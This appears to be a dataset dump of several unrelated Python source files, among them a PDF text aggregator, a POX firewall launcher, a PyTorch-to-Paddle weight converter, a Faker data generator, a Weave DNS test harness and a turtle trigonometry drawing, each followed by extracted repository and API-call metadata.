constructor = _DataTypes.get_constructor(to_type)
result = constructor(value)
return None if _DataTypes.value_is_missing_value(result) else result
except Exception as e:
raise ValueError(("Unable to cast to type %s\n" % to_type) + str(e))
@staticmethod
def datetime_from_iso(iso_string):
"""create datetime object from ISO 8601 string"""
return datetime_parser.parse(iso_string)
valid_data_types = _DataTypes()
def numpy_to_bson_friendly(obj):
"""take an object and convert it to a type that can be serialized to bson if neccessary."""
if isinstance(obj, float32) or isinstance(obj, float64):
return float(obj)
if isinstance(obj, int32):
return int(obj)
if isinstance(obj, vector.base_type):
return obj.tolist()
if isinstance(obj, datetime):
return obj.isoformat()
if isinstance(obj, dict):
return dict([(numpy_to_bson_friendly(key), numpy_to_bson_friendly(value)) for key, value in obj.items()])
if isinstance(obj, list):
return [numpy_to_bson_friendly(item) for item in obj]
# Let the base class default method raise the TypeError
return obj
| [((48, 17, 48, 49), 're.compile', 're.compile', ({(48, 28, 48, 48): '"""^vector\\\\((\\\\d+)\\\\)$"""'}, {}), "('^vector\\\\((\\\\d+)\\\\)$')", False, 'import re\n'), ((168, 15, 168, 43), 'dateutil.parser.parse', 'datetime_parser.parse', ({(168, 37, 168, 42): 'value'}, {}), '(value)', True, 'import dateutil.parser as datetime_parser\n'), ((394, 15, 394, 48), 'dateutil.parser.parse', 'datetime_parser.parse', ({(394, 37, 394, 47): 'iso_string'}, {}), '(iso_string)', True, 'import dateutil.parser as datetime_parser\n'), ((78, 20, 78, 40), 'numpy.atleast_1d', 'np.atleast_1d', ({(78, 34, 78, 39): 'array'}, {}), '(array)', True, 'import numpy as np\n'), ((159, 11, 159, 27), 'numpy.isnan', 'np.isnan', ({(159, 20, 159, 26): 'result'}, {}), '(result)', True, 'import numpy as np\n'), ((171, 19, 171, 35), 'datetime.datetime', 'datetime', ({(171, 28, 171, 34): '*value'}, {}), '(*value)', False, 'from datetime import datetime\n'), ((66, 24, 66, 57), 'numpy.array', 'np.array', (), '', True, 'import numpy as np\n'), ((199, 79, 199, 94), 'numpy.isnan', 'np.isnan', ({(199, 88, 199, 93): 'value'}, {}), '(value)', True, 'import numpy as np\n'), ((347, 23, 347, 37), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((74, 28, 74, 61), 'numpy.array', 'np.array', (), '', True, 'import numpy as np\n'), ((71, 32, 71, 49), 'json.loads', 'json.loads', ({(71, 43, 71, 48): 'value'}, {}), '(value)', False, 'import json\n')] |
poikilos/tabletopManualMiner | srd/pageaggregator.py | 94a824feabdf0a8efa1bf28670af44820aff9923 | #!/usr/bin/env python3
import math
try:
# from PDFPageDetailedAggregator:
from pdfminer.pdfdocument import PDFDocument, PDFNoOutlines
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTPage, LTChar, LTAnno, LAParams, LTTextBox, LTTextLine
except ModuleNotFoundError:
prerr("To use the aggregator (required for generating chunks.json)"
" you must first install the following module for Python:")
prerr(" pdfminer")
exit(1)
try:
input = raw_input
except NameError:
# Python 3
pass
# TODO:
from srd import (
objDict,
BBox,
DocChunk,
clean_frag_text,
clean_frag,
same_style,
frag_dict,
)
def ltannoDict(ltanno):
return objDict(ltanno)
'''
class DocFragment:
def __init__(self, text, fontname, size):
self.text = text
self.fontname = fontname
self.size = size
def sameStyle(self, fragment):
"""
Is same fontname and size.
"""
ffn = fragment.fontname
ffs = fragment.size
return (ffs == self.size) and (ffn == self.fontname)
def clean(self):
self.text = clean_frag_text(self.text)
'''
class PDFPageDetailedAggregator(PDFPageAggregator):
"""
This class is based on PDFPageDetailedAggregator from
lindblandro's Oct 4 '13 at 10:33 answer
edited by slushy Feb 4 '14 at 23:41
at <https://stackoverflow.com/a/19179114>
on <https://stackoverflow.com/questions/15737806/extract-text-using-
pdfminer-and-pypdf2-merges-columns>.
"""
def __init__(self, rsrcmgr, pageno=1, laparams=None,
colStarts=None):
PDFPageAggregator.__init__(self, rsrcmgr, pageno=pageno, laparams=laparams)
self.chunks = []
self.colStarts = colStarts
if self.colStarts is not None:
print("columns: {}".format(len(self.colStarts)))
self.page_number = 0
def receive_layout(self, ltpage):
def render(item, page_number):
if isinstance(item, LTPage) or isinstance(item, LTTextBox):
for child in item:
render(child, page_number)
elif isinstance(item, LTTextLine):
child_str = ''
fontSize = None
fontName = None
fontSizes = []
fontNames = []
warnings = []
parts = []
fragments = []
annotations = []
for child in item:
strp = None
if isinstance(child, LTChar):
child_str += child.get_text()
strp = child.get_text().strip()
# and (len(strp) > 0)
if fontName is not None:
if fontName != child.fontname:
warnings.append("mixed fontName")
if fontSize is not None:
if fontSize != child.size:
warnings.append("mixed fontSize")
fontName = child.fontname
fontSize = child.size
frag = frag_dict(
child.get_text(),
child.fontname,
child.size,
)
fragments.append(frag)
# fontNames.append(fontName)
# fontSizes.append(fontSize)
parts.append(strp)
elif isinstance(child, LTAnno):
child_str += child.get_text()
strp = child.get_text().strip()
annotations.append(ltannoDict(child))
child_str = ' '.join(child_str.split()).strip()
if child_str:
if len(warnings) > 0:
"""
print("Warnings in \"{}\":"
" {}: fonts {} sizes {} parts {}"
"".format(child_str, warnings, fontNames,
fontSizes, parts))
input("Press enter to continue...")
"""
fontSize = None
fontName = None
col = None
cols = 0
if self.colStarts is not None:
cols = len(self.colStarts)
if (cols is None) or (cols == 1):
col = 0
elif (cols == 2):
col = 0
col2Min = math.floor(self.colStarts[1])
if item.bbox[0] >= col2Min:
col = 1 # Index [1] is column 2.
else:
raise ValueError("Only a list of length 1 (same as None) or 2"
" is implemented for \"colStarts\".")
# if isinstance(child, LTChar):
'''
try:
fontName = child.fontname
fontSize = child.size
# Avoid "AttributeError:
# 'LTAnno' object has no attribute 'fontname'"
except AttributeError as ex:
print("dir(LTTextLine): {}".format(dir(LTTextLine)))
print("dir(child): {}".format(dir(child)))
raise ex
'''
chunk = DocChunk(
page_number,
col,
item.bbox,
child_str,
fontName=fontName,
fontSize=fontSize,
fragments=fragments,
annotations=annotations,
)
chunk.groupFragments()
self.chunks.append(chunk)
for child in item:
render(child, page_number)
return
render(ltpage, self.page_number)
self.page_number += 1
self.chunks = sorted(self.chunks, key = lambda f: (f.pageid, f.column, -f.bbox.y1))
self.result = ltpage
| [((37, 11, 37, 26), 'srd.objDict', 'objDict', ({(37, 19, 37, 25): 'ltanno'}, {}), '(ltanno)', False, 'from srd import objDict, BBox, DocChunk, clean_frag_text, clean_frag, same_style, frag_dict\n'), ((72, 8, 72, 83), 'pdfminer.converter.PDFPageAggregator.__init__', 'PDFPageAggregator.__init__', (), '', False, 'from pdfminer.converter import PDFPageAggregator\n'), ((162, 28, 171, 21), 'srd.DocChunk', 'DocChunk', (), '', False, 'from srd import objDict, BBox, DocChunk, clean_frag_text, clean_frag, same_style, frag_dict\n'), ((143, 34, 143, 63), 'math.floor', 'math.floor', ({(143, 45, 143, 62): 'self.colStarts[1]'}, {}), '(self.colStarts[1])', False, 'import math\n')] |
dkim286/cpsc454-proj | ctrltest.py | 16314802bae3cfbd4d1bf6d7f75a9e6adeb6700d | from pox.core import core
import pox.openflow.libopenflow_01 as of
from forwarding.l2_learning import *
from tkinter import *
from project.firewall import TestFW
from project.ui import UI
def setup():
top = Toplevel()
# quit POX when window is killed
top.protocol("WM_DELETE_WINDOW", core.quit)
top.title("firewall thing")
frame = Frame(top, padding="3")
frame.grid()
disp = Label(frame, text="hmm").grid(column=0, row=0)
def reload():
conn = core.openflow.getConnection(1)
disp.configure(str(dir(conn)))
b_reload = Button(frame, text="reload", command=reload).grid(column=0, row=1)
b_quit = Button(frame, text="quit", command=top.destroy).grid(column=0, row=2)
def launch():
fw_list_dpid = [51, 52]
srv_list = {"web" : ['10.0.0.100']}
# register firewall
core.registerNew(TestFW, fw_list_dpid[0], srv_list)
# just use L2 learning switch for others
core.registerNew(l2_learning, False)
#core.registerNew(UI)
def start_ui():
core.tk.do(setup)
core.call_when_ready(start_ui, ['openflow', 'tk'])
| [((36, 4, 36, 55), 'pox.core.core.registerNew', 'core.registerNew', ({(36, 21, 36, 27): 'TestFW', (36, 29, 36, 44): 'fw_list_dpid[0]', (36, 46, 36, 54): 'srv_list'}, {}), '(TestFW, fw_list_dpid[0], srv_list)', False, 'from pox.core import core\n'), ((39, 4, 39, 40), 'pox.core.core.registerNew', 'core.registerNew', ({(39, 21, 39, 32): 'l2_learning', (39, 34, 39, 39): '(False)'}, {}), '(l2_learning, False)', False, 'from pox.core import core\n'), ((47, 4, 47, 54), 'pox.core.core.call_when_ready', 'core.call_when_ready', ({(47, 25, 47, 33): 'start_ui', (47, 35, 47, 53): "['openflow', 'tk']"}, {}), "(start_ui, ['openflow', 'tk'])", False, 'from pox.core import core\n'), ((24, 15, 24, 45), 'pox.core.core.openflow.getConnection', 'core.openflow.getConnection', ({(24, 43, 24, 44): '1'}, {}), '(1)', False, 'from pox.core import core\n'), ((45, 8, 45, 25), 'pox.core.core.tk.do', 'core.tk.do', ({(45, 19, 45, 24): 'setup'}, {}), '(setup)', False, 'from pox.core import core\n')] |
kenmutuma001/Blog | virtual/lib/python3.6/site-packages/mako/__init__.py | 6b19a77b71694bbe9f5e84207de46c68f87ebc5e | # mako/__init__.py
# Copyright (C) 2006-2016 the Mako authors and contributors <see AUTHORS file>
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
__version__ = '1.0.9'
| [] |
RangeKing/PaddleViT | image_classification/T2T_ViT/load_pytorch_weights.py | 0e25958686e04ed8872cf67fba0dfd6918e9b4dd | # Copyright (c) 2021 PPViT Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""convert pytorch model weights to paddle pdparams"""
import os
import numpy as np
import paddle
import torch
import timm
from config import get_config
from t2t_vit import build_t2t_vit as build_model
from T2T_ViT_torch.models.t2t_vit import *
from T2T_ViT_torch.utils import load_for_transfer_learning
def print_model_named_params(model):
print('----------------------------------')
for name, param in model.named_parameters():
print(name, param.shape)
print('----------------------------------')
def print_model_named_buffers(model):
print('----------------------------------')
for name, param in model.named_buffers():
print(name, param.shape)
print('----------------------------------')
def torch_to_paddle_mapping(model_name, config):
# (torch_param_name, paddle_param_name)
mapping = [
('cls_token', 'cls_token'),
('pos_embed', 'pos_embed'),
]
for idx in range(1, 3):
th_prefix = f'tokens_to_token.attention{idx}'
pp_prefix = f'patch_embed.attn{idx}'
if '_t_' in model_name:
layer_mapping = [
(f'{th_prefix}.attn.qkv', f'{pp_prefix}.attn.qkv'),
(f'{th_prefix}.attn.proj', f'{pp_prefix}.attn.proj'),
(f'{th_prefix}.norm1', f'{pp_prefix}.norm1'),
(f'{th_prefix}.norm2', f'{pp_prefix}.norm2'),
(f'{th_prefix}.mlp.fc1', f'{pp_prefix}.mlp.fc1'),
(f'{th_prefix}.mlp.fc2', f'{pp_prefix}.mlp.fc2'),
]
else:
layer_mapping = [
(f'{th_prefix}.w', f'{pp_prefix}.w'),
(f'{th_prefix}.kqv', f'{pp_prefix}.kqv'),
(f'{th_prefix}.proj', f'{pp_prefix}.proj'),
(f'{th_prefix}.norm1', f'{pp_prefix}.norm1'),
(f'{th_prefix}.norm2', f'{pp_prefix}.norm2'),
(f'{th_prefix}.mlp.0', f'{pp_prefix}.mlp.0'),
(f'{th_prefix}.mlp.2', f'{pp_prefix}.mlp.2'),
]
mapping.extend(layer_mapping)
mapping.append(('tokens_to_token.project','patch_embed.proj'))
num_layers = config.MODEL.DEPTH
for idx in range(num_layers):
th_prefix = f'blocks.{idx}'
pp_prefix = f'blocks.{idx}'
layer_mapping = [
(f'{th_prefix}.norm1', f'{pp_prefix}.norm1'),
(f'{th_prefix}.attn.qkv', f'{pp_prefix}.attn.qkv'),
(f'{th_prefix}.attn.proj', f'{pp_prefix}.attn.proj'),
(f'{th_prefix}.norm2', f'{pp_prefix}.norm2'),
(f'{th_prefix}.mlp.fc1', f'{pp_prefix}.mlp.fc1'),
(f'{th_prefix}.mlp.fc2', f'{pp_prefix}.mlp.fc2'),
]
mapping.extend(layer_mapping)
head_mapping = [
('norm', 'norm'),
('head', 'head'),
]
mapping.extend(head_mapping)
return mapping
def convert(torch_model, paddle_model, model_name, config):
def _set_value(th_name, pd_name, transpose=True):
th_shape = th_params[th_name].shape
pd_shape = tuple(pd_params[pd_name].shape) # paddle shape default type is list
#assert th_shape == pd_shape, f'{th_shape} != {pd_shape}'
print(f'**SET** {th_name} {th_shape} **TO** {pd_name} {pd_shape}')
if isinstance(th_params[th_name], torch.nn.parameter.Parameter):
value = th_params[th_name].data.numpy()
else:
value = th_params[th_name].numpy()
if len(value.shape) == 2 and transpose:
value = value.transpose((1, 0))
pd_params[pd_name].set_value(value)
# 1. get paddle and torch model parameters
pd_params = {}
th_params = {}
for name, param in paddle_model.named_parameters():
pd_params[name] = param
for name, param in torch_model.named_parameters():
th_params[name] = param
for name, param in paddle_model.named_buffers():
pd_params[name] = param
for name, param in torch_model.named_buffers():
th_params[name] = param
# 2. get name mapping pairs
mapping = torch_to_paddle_mapping(model_name, config)
missing_keys_th = []
missing_keys_pd = []
zip_map = list(zip(*mapping))
th_keys = list(zip_map[0])
pd_keys = list(zip_map[1])
for key in th_params:
missing = False
if key not in th_keys:
missing = True
if key.endswith('.weight'):
if key[:-7] in th_keys:
missing = False
if key.endswith('.bias'):
if key[:-5] in th_keys:
missing = False
if missing:
missing_keys_th.append(key)
for key in pd_params:
missing = False
if key not in pd_keys:
missing = True
if key.endswith('.weight'):
if key[:-7] in pd_keys:
missing = False
if key.endswith('.bias'):
if key[:-5] in pd_keys:
missing = False
if missing:
missing_keys_pd.append(key)
print('====================================')
print('missing_keys_pytorch:')
print(missing_keys_th)
print('missing_keys_paddle:')
print(missing_keys_pd)
print('====================================')
# 3. set torch param values to paddle params: may needs transpose on weights
for th_name, pd_name in mapping:
if th_name in th_params and pd_name in pd_params: # nn.Parameters
if th_name.endswith('w'):
_set_value(th_name, pd_name, transpose=False)
else:
_set_value(th_name, pd_name)
else:
if f'{th_name}.weight' in th_params and f'{pd_name}.weight' in pd_params:
th_name_w = f'{th_name}.weight'
pd_name_w = f'{pd_name}.weight'
_set_value(th_name_w, pd_name_w)
if f'{th_name}.bias' in th_params and f'{pd_name}.bias' in pd_params:
th_name_b = f'{th_name}.bias'
pd_name_b = f'{pd_name}.bias'
_set_value(th_name_b, pd_name_b)
if f'{th_name}.running_mean' in th_params and f'{pd_name}._mean' in pd_params:
th_name_b = f'{th_name}.running_mean'
pd_name_b = f'{pd_name}._mean'
_set_value(th_name_b, pd_name_b)
if f'{th_name}.running_var' in th_params and f'{pd_name}._variance' in pd_params:
th_name_b = f'{th_name}.running_var'
pd_name_b = f'{pd_name}._variance'
_set_value(th_name_b, pd_name_b)
return paddle_model
def main():
paddle.set_device('cpu')
model_name_list = ['t2t_vit_7',
't2t_vit_10',
't2t_vit_12',
't2t_vit_14',
't2t_vit_14_384',
't2t_vit_19',
't2t_vit_24',
't2t_vit_24_token_labeling',
't2t_vit_t_14',
't2t_vit_t_19',
't2t_vit_t_24']
pth_model_path_list = ['./T2T_ViT_torch/t2t-vit-pth-models/71.7_T2T_ViT_7.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/75.2_T2T_ViT_10.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/76.5_T2T_ViT_12.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/81.5_T2T_ViT_14.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/83.3_T2T_ViT_14.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/81.9_T2T_ViT_19.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/82.3_T2T_ViT_24.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/84.2_T2T_ViT_24.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/81.7_T2T_ViTt_14.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/82.4_T2T_ViTt_19.pth.tar',
'./T2T_ViT_torch/t2t-vit-pth-models/82.6_T2T_ViTt_24.pth.tar']
for model_name, pth_model_path in zip(model_name_list, pth_model_path_list):
print(f'============= NOW: {model_name} =============')
sz = 384 if '384' in model_name else 224
if 'token_labeling' in model_name:
config = get_config(f'./configs/{model_name[:-15]}.yaml')
else:
config = get_config(f'./configs/{model_name}.yaml')
paddle_model = build_model(config)
paddle_model.eval()
print_model_named_params(paddle_model)
print_model_named_buffers(paddle_model)
print('+++++++++++++++++++++++++++++++++++')
device = torch.device('cpu')
if 'token_labeling' in model_name:
torch_model = eval(f'{model_name[:-15]}(img_size={sz})')
else:
if '384' in model_name:
torch_model = eval(f'{model_name[:-4]}(img_size={sz})')
else:
torch_model = eval(f'{model_name}(img_size={sz})')
load_for_transfer_learning(torch_model,
pth_model_path,
use_ema=True,
strict=False,
num_classes=1000)
torch_model = torch_model.to(device)
torch_model.eval()
print_model_named_params(torch_model)
print_model_named_buffers(torch_model)
# convert weights
paddle_model = convert(torch_model, paddle_model, model_name, config)
# check correctness
x = np.random.randn(2, 3, sz, sz).astype('float32')
x_paddle = paddle.to_tensor(x)
x_torch = torch.Tensor(x).to(device)
out_torch = torch_model(x_torch)
out_paddle = paddle_model(x_paddle)
out_torch = out_torch.data.cpu().numpy()
out_paddle = out_paddle.cpu().numpy()
print(out_torch.shape, out_paddle.shape)
print(out_torch[0, 0:100])
print('========================================================')
print(out_paddle[0, 0:100])
assert np.allclose(out_torch, out_paddle, atol = 1e-2)
# save weights for paddle model
model_path = os.path.join(f'./{model_name}.pdparams')
paddle.save(paddle_model.state_dict(), model_path)
print(f'{model_name} done')
print('all done')
if __name__ == "__main__":
main()
| [((198, 4, 198, 28), 'paddle.set_device', 'paddle.set_device', ({(198, 22, 198, 27): '"""cpu"""'}, {}), "('cpu')", False, 'import paddle\n'), ((230, 23, 230, 42), 't2t_vit.build_t2t_vit', 'build_model', ({(230, 35, 230, 41): 'config'}, {}), '(config)', True, 'from t2t_vit import build_t2t_vit as build_model\n'), ((237, 17, 237, 36), 'torch.device', 'torch.device', ({(237, 30, 237, 35): '"""cpu"""'}, {}), "('cpu')", False, 'import torch\n'), ((246, 8, 250, 52), 'T2T_ViT_torch.utils.load_for_transfer_learning', 'load_for_transfer_learning', (), '', False, 'from T2T_ViT_torch.utils import load_for_transfer_learning\n'), ((261, 19, 261, 38), 'paddle.to_tensor', 'paddle.to_tensor', ({(261, 36, 261, 37): 'x'}, {}), '(x)', False, 'import paddle\n'), ((274, 15, 274, 62), 'numpy.allclose', 'np.allclose', (), '', True, 'import numpy as np\n'), ((277, 21, 277, 61), 'os.path.join', 'os.path.join', ({(277, 34, 277, 60): 'f"""./{model_name}.pdparams"""'}, {}), "(f'./{model_name}.pdparams')", False, 'import os\n'), ((227, 21, 227, 69), 'config.get_config', 'get_config', ({(227, 32, 227, 68): 'f"""./configs/{model_name[:-15]}.yaml"""'}, {}), "(f'./configs/{model_name[:-15]}.yaml')", False, 'from config import get_config\n'), ((229, 21, 229, 63), 'config.get_config', 'get_config', ({(229, 32, 229, 62): 'f"""./configs/{model_name}.yaml"""'}, {}), "(f'./configs/{model_name}.yaml')", False, 'from config import get_config\n'), ((260, 12, 260, 41), 'numpy.random.randn', 'np.random.randn', ({(260, 28, 260, 29): '2', (260, 31, 260, 32): '3', (260, 34, 260, 36): 'sz', (260, 38, 260, 40): 'sz'}, {}), '(2, 3, sz, sz)', True, 'import numpy as np\n'), ((262, 18, 262, 33), 'torch.Tensor', 'torch.Tensor', ({(262, 31, 262, 32): 'x'}, {}), '(x)', False, 'import torch\n')] |
j-bac/id-concentration | estimators/__init__.py | 372bacc846d3d5dd5f99178863fa214fb8d3b292 | from ._FisherS import randsphere, preprocessing, SeparabilityAnalysis, point_inseparability_to_pointID
from ._call_estimators import TwoNN, run_singleGMST,run_singleCorrDim,runDANCo, runDANCoStats, runDANColoop,runANOVAglobal,runANOVAlocal,radovanovic_estimators_matlab,Hidalgo
from ._DANCo import dancoDimEst as danco_py
from ._TwoNN import twonn as twonn_py
from ._ESS import essLocalDimEst as ess_py
from ._mada import mada as mada_py
from ._corint import corint as corint_py
| [] |
NeroAsmarr/fz-api | examples/get_message.py | d688277b4c616e93c809381ab082cba834964681 | # 获取调课、改课通知例子
from zfnew import GetInfo, Login
base_url = '学校教务系统的主页url'
lgn = Login(base_url=base_url)
lgn.login('账号', '密码')
cookies = lgn.cookies # cookies获取方法
person = GetInfo(base_url=base_url, cookies=cookies)
message = person.get_message()
print(message)
| [((7, 6, 7, 30), 'zfnew.Login', 'Login', (), '', False, 'from zfnew import GetInfo, Login\n'), ((10, 9, 10, 52), 'zfnew.GetInfo', 'GetInfo', (), '', False, 'from zfnew import GetInfo, Login\n')] |
AtilioA/Sort-merge-join | input/gera_entradas.py | 6ed3199aada921973833cafffc8cbde5062b76fb | import sys
import random
from faker import Faker
def gera(nLinhas=100, nCampos=None):
with open(f"{path}/file{nLinhas}-{nCampos}_python.txt", "w+", encoding="utf8") as file:
if not nCampos:
nCampos = random.randint(2, 10)
camposFuncs = [
fake.name,
fake.date,
fake.ssn,
fake.ascii_email,
fake.job,
fake.phone_number,
fake.coordinate,
fake.license_plate,
fake.credit_card_expire,
][:nCampos]
for _ in range(nLinhas):
file.write(f"{random.randint(0, 999999)},")
for funcao in camposFuncs[:-1]:
file.write(f"{funcao()},")
file.write(camposFuncs[-1]())
file.write("\n")
if __name__ == "__main__":
fake = Faker("pt_BR")
path = "python/"
try:
nLinhas = int(sys.argv[1])
nCampos = int(sys.argv[2])
except:
nLinhas = 1000
nCampos = 10
gera(nLinhas, nCampos)
| [((32, 11, 32, 25), 'faker.Faker', 'Faker', ({(32, 17, 32, 24): '"""pt_BR"""'}, {}), "('pt_BR')", False, 'from faker import Faker\n'), ((9, 22, 9, 43), 'random.randint', 'random.randint', ({(9, 37, 9, 38): '2', (9, 40, 9, 42): '10'}, {}), '(2, 10)', False, 'import random\n'), ((24, 26, 24, 51), 'random.randint', 'random.randint', ({(24, 41, 24, 42): '(0)', (24, 44, 24, 50): '(999999)'}, {}), '(0, 999999)', False, 'import random\n')] |
zainllw0w/skillbox | lessons 20/HomeWork/task9.py | 896287b6f7f5612cf589094131fd1a12b0b192ba | def sort(data, time):
tt = False
ft = True
st = False
is_find = True
winers_name = set()
index = 0
while is_find:
index += 1
for key, values in data.items():
if time[0 - index] == int(values[1]) and ft and values[0] not in winers_name:
first_id = key
ft = False
st = True
winers_name.add(values[0])
first_i = index
elif time[0 -index] == int(values[1]) and st and values[0] not in winers_name:
second_id = key
st = False
tt = True
winers_name.add(values[0])
second_i = index
elif time[0 -index] == int(values[1]) and tt and values[0] not in winers_name:
three_id = key
winers_name.add(values[0])
is_find = False
three_i = index
break
return first_id, second_id, three_id, first_i, second_i, three_i
n = int(input('Введите количество строк: '))
data = dict()
time_list = list()
for i in range(1, n+1):
print(f'Введите {i} строку: ', end='')
text = input().split()
time = text[0]
time_list.append(int(time))
name = text[1]
obj = [name, time]
data[i] = tuple(obj)
f, s, t, fi, si, ti = sort(data, sorted(time_list))
time_list = sorted(time_list)
print('1 место занимает: {0}, с очками {1}'.format(data[f][0], time_list[-fi]))
print('2 место занимает: {0}, с очками {1}'.format(data[s][0], time_list[-si]))
print('3 место занимает: {0}, с очками {1}'.format(data[t][0], time_list[-ti])) | [] |
aiw-google/openweave-core | src/test-apps/happy/test-templates/WeaveInetDNS.py | 5dfb14b21d0898ef95bb62ff564cadfeea4b4702 | #!/usr/bin/env python
#
# Copyright (c) 2016-2017 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# Implements WeaveInet class that tests Weave Inet Layer among Weave Nodes.
#
import os
import sys
import time
from happy.ReturnMsg import ReturnMsg
from happy.Utils import *
from happy.HappyNode import HappyNode
from happy.HappyNetwork import HappyNetwork
from WeaveTest import WeaveTest
# Q: what are the parameters need to specify?
options = {}
options["quiet"] = False
options["node_id"] = None
options["tap_if"] = None
options["node_ip"] = None
options["ipv4_gateway"] = None
options["dns"] = None
options["use_lwip"] = False
def option():
return options.copy()
class WeaveInetDNS(HappyNode, HappyNetwork, WeaveTest):
def __init__(self, opts = options):
HappyNode.__init__(self)
HappyNetwork.__init__(self)
WeaveTest.__init__(self)
self.quiet = opts["quiet"]
self.node_id = opts["node_id"]
self.tap_if = opts["tap_if"]
self.prefix = opts["prefix"]
self.ipv4_gateway =opts["ipv4_gateway"]
self.dns = opts["dns"]
self.use_lwip = opts["use_lwip"]
self.node_process_tag = "WEAVE-INET-NODE"
def __log_error_and_exit(self, error):
self.logger.error("[localhost] WeaveInetDNS: %s" % (error))
sys.exit(1)
def __checkNodeExists(self, node, description):
if not self._nodeExists(node):
emsg = "The %s '%s' does not exist in the test topology." % (description, node)
self.__log_error_and_exit(emsg)
def __pre_check(self):
# Check if the name of the new node is given
if not self.node_id:
emsg = "Missing name of the virtual node that should start shell."
self.__log_error_and_exit(emsg)
# Check if virtual node exists
if not self._nodeExists():
emsg = "virtual node %s does not exist." % (self.node_id)
self.__log_error_and_exit(emsg)
# check if prefix
if self.prefix == None:
emsg = "prefix is None, Please specifiy a valid prefix."
self.__log_error_and_exit(emsg)
def __gather_results(self):
"""
gather result from get_test_output()
"""
quiet = True
results = {}
results['status'], results['output'] = self.get_test_output(self.node_id, self.node_process_tag, quiet)
return (results)
def __process_results(self, results):
"""
process results from gather_results()
"""
status = False
output = ""
status = (results['status'] == 0)
output = results['output']
return (status, output)
def __start_node_dnscheck(self):
"""
lwip and socket use different command for now
"""
cmd = "sudo "
cmd += self.getWeaveInetLayerDNSPath()
node_ip = self.getNodeAddressesOnPrefix(self.prefix, self.node_id)[0]
if node_ip == None:
emsg = "Could not find IP address of the node, %s" % (self.node_id)
self.__log_error_and_exit(emsg)
if self.use_lwip:
cmd += " --tap-device " + self.tap_if + " -a " + node_ip + " --ipv4-gateway " + self.ipv4_gateway + \
" --dns-server " + self.dns
print "dns check command : {}".format(cmd)
self.start_weave_process(self.node_id, cmd, self.node_process_tag, sync_on_output=self.ready_to_service_events_str)
def __stop_node(self):
self.stop_weave_process(self.node_id, self.node_process_tag)
def run(self):
self.logger.debug("[localhost] WeaveInetDNS: Run.")
self.__pre_check()
self.__start_node_dnscheck()
emsg = "WeaveInet %s should be running." % (self.node_process_tag)
self.logger.debug("[%s] WeaveInet: %s" % (self.node_id, emsg))
self.__stop_node()
node_output_value, node_output_data = \
self.get_test_output(self.node_id, self.node_process_tag, True)
node_strace_value, node_strace_data = \
self.get_test_strace(self.node_id, self.node_process_tag, True)
results = self.__gather_results()
result, output = self.__process_results(results)
data = {}
data["node_output"] = node_output_data
data["node_strace"] = node_strace_data
self.logger.debug("[localhost] WeaveInetDNSTest: Done.")
return ReturnMsg(result, data)
| [] |
ZezaoDev/Circtrigo | funcoes.py | 5e5f6be0bdee17d30c2993478ca25409b82b6af3 | import turtle as t
import math
class circTrigo:
def __init__(self):
self.raio = 0
self.grau = 0
self.seno = 0
self.cosseno = 0
self.tangente = 0
self.quadrante = 0
self.tema = ''
t.bgcolor("black")
t.pencolor("white")
def seta(self):
# DESENHA UMA SETA
t.left(90)
t.forward(5)
t.right(120)
t.forward(10)
t.right(120)
t.forward(10)
t.right(120)
t.forward(5)
t.right(90)
def linha(self, pxls):
# DESENHA UMA LINHA PONTILHADA
pixels = int(pxls//1)
if pixels % 2 == 0:
pixels = pixels + 1
for x in range(0, pixels//10):
t.pendown()
t.forward(5)
t.penup()
t.forward(5)
t.pendown()
t.forward(pixels%10)
def reset(self):
# RETORNA PRA POSICAO INICIAL
t.penup()
t.home()
t.pendown()
t.speed(0)
t.pensize(2)
t.pencolor("white")
def circulo(self, raio):
# DESENHA O CIRCULO
self.raio = raio
t.right(90)
t.penup()
t.forward(self.raio)
t.left(90)
t.pendown()
t.circle(self.raio)
self.reset()
def eixos(self):
# EIXO X
t.penup()
t.backward(self.raio + 50)
t.pendown()
self.linha((self.raio*2)+100)
self.seta()
self.reset()
# EIXO Y
t.left(90)
t.penup()
t.backward(self.raio + 50)
t.pendown()
self.linha((self.raio*2)+100)
self.seta()
self.reset()
def angulo(self, grau):
# DESENHA O ANGULO
self.grau = grau % 360
t.left(self.grau)
t.forward(self.raio)
self.reset()
# DEFINE O VALOR DO SENO, COSSENO E TANGENTE.
self.seno = math.sin(math.radians(self.grau))
self.cosseno = math.cos(math.radians(self.grau))
self.tangente = math.tan(math.radians(self.grau))
# DEFINE O QUADRANTE DO ANGULO
vquad = self.grau
if 0 < vquad < 90:
self.quadrante = 1
elif 90 < vquad < 180:
self.quadrante = 2
elif 180 < vquad < 270:
self.quadrante = 3
elif 270 < vquad < 360:
self.quadrante = 4
if vquad == 0 or vquad == 90 or vquad == 180 or vquad == 270 or vquad == 360: # Quadrante 0 representa os angulos de resultados indefinidos
self.quadrante = 0
def sen(self):
# DESENHA O SENO
t.left(self.grau)
t.forward(self.raio)
t.pencolor("red")
